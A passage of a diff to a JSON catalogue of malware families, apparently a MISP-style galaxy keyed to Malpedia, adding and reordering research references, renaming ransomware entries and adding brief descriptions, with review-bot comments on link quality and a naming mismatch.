"https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", - "https://blog.reversinglabs.com/blog/rats-in-the-library" + 
"https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", + "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Bladabindi" @@ -22973,6 +26277,19 @@ "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", "value": "NjRAT" }, + { + "description": "It's .NET Rat with harcoded key ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nmass", + "https://sebdraven.medium.com/a-net-rat-target-mongolia-9c1439c39bc2" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c0a8dc47-13fa-45d7-b55a-e69d798b3244", + "value": "nmass malware" + }, { "description": "", "meta": { @@ -23002,6 +26319,19 @@ "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", "value": "Nokki" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a077c784-6bc5-488d-b844-978d8d081390", + "value": "NoxPlayer" + }, { "description": "", "meta": { 
@@ -23029,12 +26359,27 @@
 "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de",
 "value": "nRansom"
 },
+ {
+ "description": "NSFOCUS describes PhantomNugget as a modularized malware toolkit, that was spread using EternalBlue. Payloads included a RAT and a XMRig miner.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nugget_phantom",
+ "https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/",
+ "https://staging.nsfocusglobal.com/wp-content/uploads/2018/10/NuggetPhantom-Analysis-Report-V4.1.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "25a5ded7-6167-4f9a-b55d-9cfc9a9a9f22",
+ "value": "NuggetPhantom"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando",
- "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/"
+ "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/",
+ "https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/"
 ],
 "synonyms": [],
 "type": []
@@ -23102,9 +26447,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat",
 "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://securelist.com/transparent-tribe-part-2/98233/",
 "https://www.secrss.com/articles/24995",
+ "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
 "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
 ],
@@ -23263,7 +26610,7 @@
 "value": "ONHAT"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni",
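Review bot: The new NuggetPhantom entry's description names the family "PhantomNugget", while `value`, the Malpedia slug `win.nugget_phantom` and the referenced report file name all say NuggetPhantom; suggest `"description": "NSFOCUS describes NuggetPhantom as a modularized malware toolkit that was spread using EternalBlue. Payloads included a RAT and an XMRig miner."`. The NSFOCUS ref is served from a `staging.` host (`https://staging.nsfocusglobal.com/...`), which looks like a pre-production site that may not stay reachable; worth swapping for the production URL or an archived copy if one exists.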
@@ -23273,7 +26620,7 @@
 "type": []
 },
 "uuid": "c182f370-4721-4968-a3b1-a7e96ab876df",
- "value": "Oni Ransomware"
+ "value": "Oni"
 },
 {
 "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ",
@@ -23315,8 +26662,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
 "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/"
 ],
 "synonyms": [],
@@ -23341,6 +26689,19 @@
 "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7",
 "value": "Opachki"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opensupdater",
+ "https://blog.google/threat-analysis-group/financially-motivated-actor-breaks-certificate-parsing-avoid-detection/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "03d44ec8-ebb4-4d90-9773-c11f4a7de074",
+ "value": "OpenSUpdater"
+ },
 {
 "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.",
 "meta": {
@@ -23401,6 +26762,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat",
 "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
 "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
 "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html",
 "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
@@ -23439,8 +26801,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski",
- "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/",
 "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
+ "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
+ "https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view",
 "https://twitter.com/albertzsigovits/status/1160874557454131200"
 ],
 "synonyms": [],
@@ -23454,7 +26818,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno",
- "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit"
+ "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit",
+ "https://labs.k7computing.com/?p=21562"
 ],
 "synonyms": [
 "Babax"
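Review bot: The new `drive.google.com/file/d/…/view` reference in the Oski list is a share link under a third party's control: the file behind it can be replaced or the share revoked without the URL changing, so the citation cannot be re-checked later and its content is not pinned. Prefer the original publication URL or a `web.archive.org/web/<timestamp>/…` snapshot of the kind this file already uses for other references. The `docs.google.com/spreadsheets/d/…` link added to Pay2Key further down has the same weakness.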
@@ -23466,6 +26831,19 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ousaban",
+ "https://www.welivesecurity.com/2021/05/05/ousaban-private-photo-collection-hidden-cabinet/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6620c7ce-63a2-48db-a584-4c5c516bda13",
+ "value": "Ousaban"
+ },
+ {
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt",
@@ -23475,7 +26853,7 @@
 "type": []
 },
 "uuid": "90e5a21a-c058-47a0-aa4d-bffde7ba698e",
- "value": "OutCrypt Ransomware"
+ "value": "OutCrypt"
 },
 {
 "description": "",
@@ -23542,7 +26920,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy",
- "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20"
+ "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/",
+ "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -23617,8 +26997,12 @@
 "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
 "https://www.spamhaus.org/news/article/771/",
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
 "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html",
 "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
 "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/"
@@ -23633,19 +27017,34 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer",
+ "https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7fa924a9-4d7a-406c-b298-bf3b01557ac8",
+ "value": "Panda Stealer"
+ },
+ {
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise",
 "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again",
+ "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
 "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/",
- "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/"
+ "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/",
+ "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "4f7e7602-79f8-4eea-8239-fb2d4ceadb9f",
- "value": "Paradise Ransomware"
+ "value": "Paradise"
 },
 {
 "description": "Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous \"coronamalware\" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.",
@@ -23680,7 +27079,7 @@
 "value": "parasite_http"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock",
@@ -23690,18 +27089,20 @@
 "type": []
 },
 "uuid": "1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8",
- "value": "Passlock Ransomware"
+ "value": "Passlock"
 },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key",
- "https://research.checkpoint.com/2020/ransomware-alert-pay2key/",
- "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
+ "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf"
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://research.checkpoint.com/2020/ransomware-alert-pay2key/",
+ "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf",
+ "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/"
 ],
 "synonyms": [
 "Cobalt"
@@ -23717,6 +27118,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash",
 "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
 "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
 "https://blog.reversinglabs.com/blog/hidden-cobra"
 ],
@@ -23741,19 +27143,6 @@
 "uuid": "ee450087-00e4-4b59-9ea7-6650d5551ea9",
 "value": "PeddleCheap"
 },
- {
- "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "49321579-9dfe-45c6-80df-79467e4af65d",
- "value": "Peepy RAT"
- },
 {
 "description": "",
 "meta": {
@@ -23779,6 +27168,19 @@
 "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086",
 "value": "Penco"
 },
+ {
+ "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.peppy_rat",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "49321579-9dfe-45c6-80df-79467e4af65d",
+ "value": "Peppy RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -23858,32 +27260,42 @@
 "value": "Philadephia Ransom"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
 "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos",
+ "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
 "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
 "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware"
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "d061daca-4415-4b3e-9034-231e37857eed",
- "value": "Phobos Ransomware"
+ "value": "Phobos"
 },
 {
 "description": "Keylogger, information stealer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger",
+ "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
 "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger"
 ],
 "synonyms": [],
@@ -23920,6 +27332,8 @@
 "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://www.johannesbader.ch/2016/02/phorpiex/",
+ "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
+ "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/",
 "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/",
 "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
@@ -23940,6 +27354,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
 ],
 "synonyms": [],
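Review bot: The Phobos refs now hold both `https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/` and `https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/`, which by their paths appear to be the English and Japanese editions of one article. If the list is meant to carry one entry per source, keeping only the English edition avoids the near-duplicate; if both editions are wanted deliberately, it is worth saying so in the contributing guidance so the next reviewer does not ask the same question. The rest of the hunk is moves plus additions and raises nothing further.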
@@ -23968,7 +27383,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
 ],
 "synonyms": [],
 "type": []
@@ -23976,6 +27392,19 @@
 "uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38",
 "value": "PILLOWMINT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pingback",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a05b1eba-8e89-4d05-97ef-cacc5a083913",
+ "value": "PingBack"
+ },
 {
 "description": "",
 "meta": {
@@ -24015,6 +27444,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou",
 "https://isc.sans.edu/diary/rss/25068",
+ "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf",
 "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf",
 "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
 "https://johannesbader.ch/2019/07/the-dga-of-pitou/"
@@ -24160,87 +27590,108 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx",
- "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
 "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://community.rsa.com/thread/185439",
+ "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president",
+ "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
+ "https://www.recordedfuture.com/china-linked-ta428-threat-group",
+ "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf",
+ "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/",
+ "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/",
+ "https://blog.xorhex.com/blog/mustangpandaplugx-1/",
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://unit42.paloaltonetworks.com/thor-plugx-variant/",
 "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
 "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
+ "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
+ "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
+ "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html",
+ "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
+ "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
+ "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
+ "https://blog.xorhex.com/blog/reddeltaplugxchangeup/",
+ "https://securelist.com/time-of-death-connected-medicine/84315/",
+ "https://tracker.h3x.eu/info/290",
+ "https://www.contextis.com/de/blog/avivore",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/",
+ "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
+ "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://www.secureworks.com/research/threat-profiles/bronze-olive",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
+ "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/",
 "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://www.macnica.net/file/security_report_20160613.pdf",
+ "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://twitter.com/stvemillertime/status/1261263000960450562",
 "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
